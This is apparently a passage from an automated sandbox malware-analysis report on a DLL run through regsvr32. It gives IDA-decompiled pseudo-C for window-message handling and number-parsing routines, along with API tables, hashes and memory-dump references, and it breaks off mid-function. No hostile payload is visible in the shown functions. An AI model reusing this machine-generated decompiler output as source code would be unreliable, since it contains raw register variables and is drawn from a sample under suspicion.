											__eflags =  *(_t215 - 0x60);
											if( *(_t215 - 0x60) == 0) {
												_t116 = E1001A722( *((intOrPtr*)(_t215 - 0x5c)));
											}
										}
										goto L78;
									}
								} else {
									__eflags = _t169;
									if(_t169 != 0) {
										_t116 =  *((intOrPtr*)( *_t169 + 4))(1);
									}
									goto L78;
								}
							}
							_t160 = E1000EC8A(_t169);
							__eflags = _t160 -  *(_t215 - 0x14);
							if(_t160 !=  *(_t215 - 0x14)) {
								 *((intOrPtr*)( *_t169 + 0x58))();
								 *((intOrPtr*)( *_t169 + 4))(1);
								_t169 = 0;
								__eflags = 0;
								 *(_t211 + 0xcc) = 0;
							}
							__eflags = _t169;
							if(_t169 != 0) {
								goto L25;
							} else {
								goto L19;
							}
						} else {
							__eflags = _t116;
							if(_t116 == 0) {
								_t116 = E100655E1(0x10094918, E10062AFA);
								 *(_t116 + 0xd0) =  *(_t116 + 0xd0) & 0x00000000;
								 *(_t116 + 0xd4) =  *(_t116 + 0xd4) | 0xffffffff;
							}
							goto L78;
						}
					}
				} else {
					L50:
					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E10041F78(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E100428A7(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

0x1003bd5a
0x1003bd5f
0x1003bd63
0x1003bd68
0x1003bd6b
0x1003bd73
0x1003bd76
0x1003bd79
0x1003bda7
0x1003bdac
0x1003c0df
0x1003c0df
0x00000000
0x1003c0df
0x1003bdb4
0x1003bdb9
0x00000000
0x00000000
0x1003bdc1
0x1003bdc6
0x00000000
0x1003bdcc
0x1003bdcc
0x1003bdce
0x1003bdce
0x1003bdd5
0x1003bde8
0x00000000
0x1003bde8
0x1003bdeb
0x1003bded
0x1003be28
0x1003be2c
0x1003be2f
0x1003be35
0x1003be3a
0x1003be3c
0x1003be3f
0x1003be69
0x1003be6b
0x1003be71
0x1003be74
0x1003be76
0x1003be78
0x1003be7b
0x1003be84
0x1003be84
0x1003be86
0x1003be8a
0x1003be91
0x1003be96
0x1003be98
0x1003bebc
0x1003bec2
0x1003bec5
0x1003becb
0x1003bed3
0x1003bed8
0x1003bedb
0x1003bede
0x1003bee1
0x1003bee7
0x1003bef6
0x1003bf00
0x1003bf06
0x1003bf08
0x1003bf18
0x1003bf18
0x1003bf1e
0x1003bf27
0x1003bf2e
0x1003bf34
0x1003bf42
0x1003bf47
0x1003bf4f
0x1003bf5f
0x1003bf64
0x1003bf6a
0x1003bf6c
0x1003bf6e
0x1003bf74
0x1003bf77
0x1003bfcb
0x1003bfcb
0x1003bfce
0x1003c0d7
0x1003c066
0x1003c06a
0x1003c06f
0x1003c076
0x1003c076
0x1003c07c
0x1003c089
0x1003c089
0x1003c094
0x1003c09d
0x1003c0a3
0x1003c0a7
0x00000000
0x1003c0a7
0x1003bfd9
0x1003bfe5
0x1003bfe5
0x1003bfe7
0x1003bfef
0x1003bff2
0x1003bff5
0x1003bff7
0x1003bff7
0x1003bff9
0x1003bff9
0x1003c00b
0x1003c011
0x1003c015
0x1003c023
0x1003c02e
0x1003c034
0x1003c037
0x1003c03a
0x1003c04a
0x1003c04a
0x1003c05d
0x00000000
0x1003c017
0x1003c01a
0x1003c01f
0x1003c021
0x1003c063
0x1003c063
0x00000000
0x1003c063
0x00000000
0x1003c021
0x1003bf79
0x1003bf79
0x1003bf7f
0x00000000
0x00000000
0x1003bf81
0x1003bf85
0x1003bfb4
0x1003bfb7
0x1003bfc1
0x1003bfc1
0x1003bf87
0x1003bf8b
0x1003bfa9
0x1003bfa9
0x1003c0a9
0x1003c0a9
0x1003c0ad
0x1003c0b3
0x1003c0b7
0x1003c0c0
0x1003c0c5
0x1003c0b7
0x00000000
0x1003c0ad
0x1003be9a
0x1003be9a
0x1003be9c
0x1003bea8
0x1003bea8
0x00000000
0x1003be9c
0x1003be98
0x1003be43
0x1003be48
0x1003be4b
0x1003be51
0x1003be5a
0x1003be5d
0x1003be5d
0x1003be5f
0x1003be5f
0x1003be65
0x1003be67
0x00000000
0x00000000
0x00000000
0x00000000
0x1003bdef
0x1003bdef
0x1003bdf1
0x1003be01
0x1003be06
0x1003be0d
0x1003be0d
0x00000000
0x1003bdf1
0x1003bded
0x1003c0e2
0x1003c0e2
0x1003c0e2
0x1003c0e8
0x1003c1b0
0x1003c1b6
0x1003c1be
0x1003c1be
0x1003c0ee
0x1003c0f0
0x1003c0f0
0x1003c0f5
0x1003c0f7
0x00000000
0x00000000
0x1003c0f9
0x1003c0fb
0x1003c119
0x1003c119
0x1003c11f
0x1003c129
0x1003c129
0x1003c12f
0x1003c13e
0x1003c13e
0x1003c13e
0x1003c140
0x1003c140
0x1003c144
0x00000000
0x00000000
0x1003c146
0x1003c148
0x1003c1aa
0x1003c1ab
0x00000000
0x1003c1ab
0x1003c14a
0x1003c150
0x00000000
0x00000000
0x1003c152
0x1003c158
0x00000000
0x00000000
0x1003c15a
0x1003c160
0x00000000
0x00000000
0x1003c162
0x1003c168
0x00000000
0x00000000
0x1003c16a
0x1003c170
0x00000000
0x00000000
0x1003c172
0x1003c178
0x00000000
0x00000000
0x1003c17a
0x1003c180
0x00000000
0x00000000
0x1003c182
0x1003c188
0x00000000
0x00000000
0x1003c18a
0x1003c190
0x00000000
0x00000000
0x1003c192
0x1003c198
0x00000000
0x00000000
0x1003c19a
0x1003c1a0
0x00000000
0x00000000
0x1003c1a2
0x1003c1a8
0x00000000
0x00000000
0x00000000
0x1003c1a8
0x1003c131
0x1003c137
0x00000000
0x00000000
0x1003c139
0x1003c13b
0x00000000
0x1003c13b
0x1003c121
0x1003c127
0x00000000
0x00000000
0x00000000
0x1003c127
0x1003c0fd
0x1003c103
0x00000000
0x00000000
0x1003c10e
0x1003c10e
0x1003c111
0x1003c113
0x00000000
0x00000000
0x00000000
0x1003c113

APIs

__EH_prolog.LIBCMT ref: 1003BD5A
GetKeyState.USER32(00000001), ref: 1003BDA7
GetKeyState.USER32(00000002), ref: 1003BDB4
GetKeyState.USER32(00000004), ref: 1003BDC1
GetParent.USER32(?), ref: 1003BDE2
SendMessageA.USER32 ref: 1003BEBC
SendMessageA.USER32 ref: 1003BF00
SendMessageA.USER32 ref: 1003BF18
ScreenToClient.USER32(?,?), ref: 1003BF34
GetCursorPos.USER32(?), ref: 1003BF8B
SendMessageA.USER32 ref: 1003BFA9
SendMessageA.USER32 ref: 1003C00B
SendMessageA.USER32 ref: 1003C02E
SendMessageA.USER32 ref: 1003C04A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 1003C05D
SendMessageA.USER32 ref: 1003C089
SendMessageA.USER32 ref: 1003C0D7
GetParent.USER32(?), ref: 1003C108

Strings

(, xrefs: 1003BEE7
@, xrefs: 1003C011
(, xrefs: 1003BF4F

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: bd488da8fbe92875d872326809ca82195c525a0fb116755e98f07da79c410d6d
Instruction ID: 522b816a59507e61edebe7ade76aa1685521bd19f933de92b240df3e25d0c3a6
Opcode Fuzzy Hash: bd488da8fbe92875d872326809ca82195c525a0fb116755e98f07da79c410d6d
Instruction Fuzzy Hash: 5BC1DF70E007599FEB16CFA9CC84F9EBBA1EF04341F11412AEA16EE1E2C774AD419B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B900 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1002B900(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				void* __ebx;
				void* __esi;
				_Unknown_base(*)()* _t52;
				signed int _t53;
				_Unknown_base(*)()* _t55;
				_Unknown_base(*)()* _t57;
				_Unknown_base(*)()* _t59;
				long _t62;
				signed char _t64;
				signed char _t70;
				void* _t78;
				int _t79;
				void* _t87;
				int _t88;
				signed char _t89;
				struct HWND__* _t90;
				long _t92;

				_t87 = __edx;
				_t100 =  &_v24;
				_t88 = _a8;
				_t106 = _t88 - 0x82;
				if(_t88 != 0x82) {
					_t90 = _a4;
					__eflags = GetPropA(_t90, 0);
					if(__eflags == 0) {
						__eflags = _t88 - 0x86;
						if(_t88 > 0x86) {
							__eflags = _t88 - 0x138;
							if(_t88 > 0x138) {
								__eflags = _t88 - 0x1943;
								if(__eflags < 0) {
									goto L7;
								} else {
									__eflags = _t88 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3ee;
									} else {
										goto L7;
									}
								}
							} else {
								__eflags = _t88 - 0x132;
								if(_t88 >= 0x132) {
									GetClassNameA(_t90,  &_v16, 0x10);
									__eflags = lstrcmpA("#32770",  &_v16);
									if(__eflags == 0) {
										_t52 = GetWindowLongA(_t90, 4);
										__eflags = _t52;
										if(_t52 != 0) {
											__eflags = _t52 - 0xffff0000;
											if(_t52 <= 0xffff0000) {
												L40:
												_t92 = _a16;
												_t79 = _a12;
												_t53 = CallWindowProcA(_t52, _t90, _t88, _t79, _t92);
												__eflags = _t53;
												if(__eflags == 0) {
													L42:
													_t55 = E1002A360(__eflags, _t90, 6);
													_t100 = _t100 + 8;
													_t52 = CallWindowProcA(_t55, _t90, _t88 + 0xcbf, _t79, _t92);
													__eflags = _t52;
													if(_t52 == 0) {
														goto L44;
													} else {
														__eflags = _t52 - 1;
														if(_t52 == 1) {
															goto L44;
														}
													}
												} else {
													__eflags = _t53 - 1;
													if(__eflags == 0) {
														goto L42;
													}
												}
											} else {
												__eflags =  *0x10096d40 - 0x30a;
												if(__eflags > 0) {
													goto L40;
												} else {
													_t92 = _a16;
													_t79 = _a12;
													_t57 = E1002A360(__eflags, _t90, 6);
													_t100 =  &_v24 + 8;
													_t52 = CallWindowProcA(_t57, _t90, _t88 + 0xcbf, _t79, _t92);
													__eflags = _t52;
													if(_t52 == 0) {
														goto L44;
													} else {
														__eflags = _t52 - 1;
														if(_t52 == 1) {
															goto L44;
														}
													}
												}
											}
										} else {
											_t92 = _a16;
											_t79 = _a12;
											_push(_t92);
											goto L45;
										}
									} else {
										_t92 = _a16;
										_t79 = _a12;
										_t59 = E1002A360(__eflags, _t90, 6);
										_t100 =  &_v24 + 8;
										_t52 = CallWindowProcA(_t59, _t90, _t88 + 0xcbf, _t79, _t92);
										__eflags = _t52;
										if(_t52 == 0) {
											L44:
											_push(_t92);
											L45:
											_push(_t79);
											_push(_t88);
											_t52 = E1002B070(_t52, _t87, _t90);
										} else {
											__eflags = _t52 - 1;
											if(_t52 == 1) {
												goto L44;
											}
										}
									}
									__eflags = _t52;
									if(__eflags == 0) {
										goto L8;
									} else {
										return _t52;
									}
								} else {
									__eflags = _t88 - 0x110;
									if(__eflags == 0) {
										_v20 = E1002A360(__eflags, _t90, 6);
										__eflags =  *0x10096d40 - 0x35f;
										if( *0x10096d40 < 0x35f) {
											L22:
											_v24 = 1;
										} else {
											_t70 = GetWindowLongA(_t90, 0xfffffff0);
											_v24 = 0;
											__eflags = _t70 & 0x00000004;
											if((_t70 & 0x00000004) == 0) {
												goto L22;
											}
										}
										_t62 = SendMessageA(_t90, 0x11f0, 0,  &_v24);
										__eflags = _v24;
										if(_v24 != 0) {
											_t80 = _a12;
											_t64 = CallWindowProcA(_v20, _t90, _t88, _a12, _a16);
											__eflags =  *0x10096d40 - 0x35f;
											_t89 = _t64;
											if( *0x10096d40 < 0x35f) {
												L27:
												E1002AF70(_t64, _t80, _t87, _t90, 0xffff);
											} else {
												_t64 = GetWindowLongA(_t90, 0xfffffff0);
												__eflags = _t64 & 0x00000004;
												if((_t64 & 0x00000004) == 0) {
													goto L27;
												}
											}
											return _t89;
										} else {
											E1002ACC0(_t62, _t78, _t87, _t90);
											return CallWindowProcA(_v24, _t90, _t88, _a8, _a12);
										}
									} else {
										goto L7;
									}
								}
							}
						} else {
							__eflags = _t88 - 0x85;
							if(_t88 >= 0x85) {
								L16:
								__eflags =  *0x10096d40 - 0x35f;
								if(__eflags >= 0) {
									L19:
									return CallWindowProcA(E1002A360(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
								} else {
									__eflags = IsIconic(_t90);
									if(__eflags != 0) {
										goto L19;
									} else {
										return E1002B150(_t90, _t88, _a12, _a16, 0);
									}
								}
							} else {
								__eflags = _t88 - 0xc;
								if(__eflags == 0) {
									goto L16;
								} else {
									L7:
									_t79 = _a12;
									_t92 = _a16;
									L8:
									return CallWindowProcA(E1002A360(__eflags, _t90, 6), _t90, _t88, _t79, _t92);
								}
							}
						}
					} else {
						return CallWindowProcA(E1002A360(__eflags, _t90, 6), _t90, _t88, _a12, _a16);
					}
				} else {
					return E1002A590(_t106, _a4, _t88, _a12, _a16, 6);
				}
			}

0x1002b900
0x1002b900
0x1002b907
0x1002b90b
0x1002b911
0x1002b939
0x1002b94b
0x1002b94d
0x1002b977
0x1002b97d
0x1002b9b4
0x1002b9ba
0x1002b9d2
0x1002b9d8
0x00000000
0x1002b9da
0x1002b9da
0x1002b9e0
0x1002bc1f
0x1002bc2d
0x1002b9e6
0x00000000
0x1002b9e6
0x1002b9e0
0x1002b9bc
0x1002b9bc
0x1002b9c2
0x1002bb0b
0x1002bb21
0x1002bb23
0x1002bb62
0x1002bb68
0x1002bb6a
0x1002bb7a
0x1002bb7f
0x1002bbbb
0x1002bbbb
0x1002bbbf
0x1002bbc8
0x1002bbce
0x1002bbd0
0x1002bbd7
0x1002bbe4
0x1002bbe9
0x1002bbed
0x1002bbf3
0x1002bbf5
0x00000000
0x1002bbf7
0x1002bbf7
0x1002bbfa
0x00000000
0x00000000
0x1002bbfa
0x1002bbd2
0x1002bbd2
0x1002bbd5
0x00000000
0x00000000
0x1002bbd5
0x1002bb81
0x1002bb81
0x1002bb8a
0x00000000
0x1002bb8c
0x1002bb8c
0x1002bb90
0x1002bba1
0x1002bba6
0x1002bbaa
0x1002bbb0
0x1002bbb2
0x00000000
0x1002bbb4
0x1002bbb4
0x1002bbb7
0x00000000
0x1002bbb9
0x1002bbb7
0x1002bbb2
0x1002bb8a
0x1002bb6c
0x1002bb6c
0x1002bb70
0x1002bb74
0x00000000
0x1002bb74
0x1002bb25
0x1002bb25
0x1002bb29
0x1002bb3a
0x1002bb3f
0x1002bb43
0x1002bb49
0x1002bb4b
0x1002bbfc
0x1002bbfc
0x1002bbfd
0x1002bbfd
0x1002bbfe
0x1002bbff
0x1002bb51
0x1002bb51
0x1002bb54
0x00000000
0x1002bb5a
0x1002bb54
0x1002bb4b
0x1002bc04
0x1002bc06
0x00000000
0x1002bc13
0x1002bc13
0x1002bc13
0x1002b9c8
0x1002b9c8
0x1002b9ce
0x1002ba4b
0x1002ba52
0x1002ba5b
0x1002ba72
0x1002ba72
0x1002ba5d
0x1002ba60
0x1002ba66
0x1002ba6e
0x1002ba70
0x00000000
0x00000000
0x1002ba70
0x1002ba87
0x1002ba8d
0x1002ba92
0x1002babf
0x1002bacc
0x1002bad2
0x1002badb
0x1002badd
0x1002baec
0x1002baf2
0x1002badf
0x1002bae2
0x1002bae8
0x1002baea
0x00000000
0x00000000
0x1002baea
0x1002bb00
0x1002ba94
0x1002ba95
0x1002bab8
0x1002bab8
0x1002b9d0
0x00000000
0x1002b9d0
0x1002b9ce
0x1002b9c2
0x1002b97f
0x1002b97f
0x1002b985
0x1002b9e8
0x1002b9e8
0x1002b9f1
0x1002ba1b
0x1002ba40
0x1002b9f3
0x1002b9fa
0x1002b9fc
0x00000000
0x1002b9fe
0x1002ba18
0x1002ba18
0x1002b9fc
0x1002b987
0x1002b987
0x1002b98a
0x00000000
0x1002b98c
0x1002b98c
0x1002b98c
0x1002b990
0x1002b994
0x1002b9b1
0x1002b9b1
0x1002b98a
0x1002b985
0x1002b94f
0x1002b974
0x1002b974
0x1002b913
0x1002b934
0x1002b934

APIs

GetPropA.USER32(?,00000000), ref: 1002B945
CallWindowProcA.USER32(00000000), ref: 1002B967

Part of subcall function 1002A590: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 1002A5B6
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5CE
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5DA

Strings

#32770, xrefs: 1002BB16

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID: #32770
API String ID: 2276450057-463685578
Opcode ID: f034260e6c97fac0f8aad33e38e8553298fe876ed76bd4295ae9a5bf2d7e3712
Instruction ID: 8bcb52e2b5fe88e302eaeb9ca96eb74ae2b52b5d7f79149c07577ca59f6ff343
Opcode Fuzzy Hash: f034260e6c97fac0f8aad33e38e8553298fe876ed76bd4295ae9a5bf2d7e3712
Instruction Fuzzy Hash: A4810632701715BBE210EB15EC85F9F77ACFB867A1F800426FA4583251DB26A985C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 10027A87 Relevance: 26.7, Strings: 21, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E10027A87(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v58;
				signed int _v62;
				signed int _v66;
				signed int _v68;
				char _v73;
				char _v96;
				signed int _t121;
				intOrPtr _t141;
				intOrPtr _t143;
				signed int _t146;
				intOrPtr* _t148;

				_t148 = _a12;
				_v16 =  &_v96;
				_t121 = 0;
				_t146 = 1;
				_v44 = 0;
				_v28 = _t146;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v36 = 0;
				_v48 = 0;
				_v52 = 0;
				_v32 = 0;
				_v12 = 0;
				_v24 = 0;
				_a12 = _t148;
				L1:
				_t143 =  *_t148;
				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
					_t148 = _t148 + 1;
					goto L1;
				}
				_push(4);
				while(1) {
					L7:
					_t141 =  *_t148;
					_t148 = _t148 + 1;
					if(_t121 > 0xb) {
						break;
					}
					switch( *((intOrPtr*)(_t121 * 4 +  &M10027F28))) {
						case 0:
							__eflags = _t141 - 0x31;
							if(_t141 < 0x31) {
								L12:
								__eflags = _t141 -  *0x10091480; // 0x2e
								if(__eflags != 0) {
									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x10091480; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x10091480; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x1009147c - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x10091270; // 0x1009127a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E100222E3(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x10091480; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x1009147c - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x10091270; // 0x1009127a
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E100222E3(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
							__eflags =  *0x1009147c - __edx;
							_v40 = __edx;
							if( *0x1009147c <= __edx) {
								__ecx =  *0x10091270; // 0x1009127a
								__eax = __bl & 0x000000ff;
								__eax = __bl & 0x000000ff & __esi;
								__eflags = __eax;
							} else {
								__eax = __bl & 0x000000ff;
